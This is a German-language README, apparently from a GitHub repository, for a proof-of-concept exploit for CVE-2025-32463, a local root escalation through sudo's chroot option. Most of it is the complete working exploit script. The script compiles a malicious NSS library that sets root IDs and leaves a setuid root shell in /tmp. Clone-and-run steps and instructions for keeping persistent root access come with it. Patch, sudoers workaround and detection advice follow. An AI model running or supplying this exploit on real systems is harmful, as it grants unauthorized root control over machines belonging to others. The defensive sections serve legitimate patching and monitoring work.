
Lokaler Privilege-Escalation-Exploit für CVE-2025-32463, der einen Designfehler bei sudo chroot ausnutzt. Stellt ein PoC-Skript, technische Analyse und Anleitungen zur Schadensbegrenzung für die betroffenen sudo-Versionen 1.9.14-1.9.17 bereit.
CVE-2025-32463 ist eine kritische lokale Privilegieneskalations-Schwachstelle in sudo-Versionen 1.9.14 bis 1.9.17. Diese Schwachstelle ermöglicht es Angreifern mit sudo-Berechtigungen, durch Ausnutzung eines Designfehlers in der Verarbeitungslogik der chroot-Option Root-Zugriff zu erlangen.
Die Schwachstelle entsteht durch ein Timing-Problem im Sicherheitsvalidierungsprozess von sudo. Die Funktion pivot_root wird vor der Überprüfung der Sicherheitsrichtlinie ausgeführt, sodass Angreifer die Dateisystemumgebung manipulieren können, die sudo für Authentifizierung und Autorisierung verwendet.
nsswitch.confpivot_root: Wird zu früh im Prozess ausgeführtset_cmnd_path: Arbeitet in der manipulierten Umgebungcommand_matches: Sicherheitsprüfungen werden aufgrund der Umgebungsmanipulation umgangenBevor Sie diesen Exploit verwenden, stellen Sie sicher, dass die folgenden Bedingungen erfüllt sind:
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
chmod +x cve-2025-32463.sh
./cve-2025-32463.sh
Prüfen Sie, ob das Zielsystem verwundbar ist:
# Check sudo version
sudo --version
# Check sudo privileges
sudo -l
# Look for chroot-related permissions
sudo -l | grep chroot
Das Haupt-Exploit-Skript (cve-2025-32463.sh):
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit
STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
system("id > /tmp/pwned_proof.txt");
system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
execl("/bin/bash", "/bin/bash", NULL);
}
CEOF
mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c
echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest
# Cleanup
rm -rf ${STAGE?}
Nach erfolgreicher Ausnutzung verifizieren Sie den Root-Zugriff:
# Check current privileges
whoami
# Check proof file
cat /tmp/pwned_proof.txt
# Use setuid bash for persistent root access
/tmp/rootbash -p
sudo aktualisieren auf Version 1.9.17p1 oder neuer:
# Ubuntu/Debian
sudo apt update && sudo apt upgrade sudo
# CentOS/RHEL
sudo yum update sudo
# or
sudo dnf update sudo
chroot-Direktiven aus sudoers entfernen (vorübergehende Problemumgehung):
# Backup current configuration
sudo cp /etc/sudoers /etc/sudoers.backup
# Remove chroot-related entries
sudo sed -i '/chroot/d' /etc/sudoers
# Verify syntax
sudo visudo -c
Überwachen Sie auf Ausnutzungsversuche:
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d
# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo
# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f
Die Schwachstelle hat ihre Ursache in einem Designfehler im Ausführungsablauf von sudo:
Normaler erwarteter Ablauf:
Tatsächlicher verwundbarer Ablauf:
Der Exploit nutzt das Name Service Switch (NSS)-System:
/etc/nsswitch.conf für die BenutzerauthentifizierungDieser Exploit wurde getestet auf:
⚠️ WICHTIGER HAFTUNGSAUSSCHLUSS ⚠️
Dieses Tool wird ausschließlich für Bildungs- und autorisierte Testzwecke bereitgestellt.
Beiträge sind willkommen! Bitte:
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE für Details.
Hinweis: Diese Schwachstelle betrifft eine kritische Systemkomponente. Bitte verwenden Sie sie verantwortungsvoll und stellen Sie sicher, dass alle Tests autorisiert sind.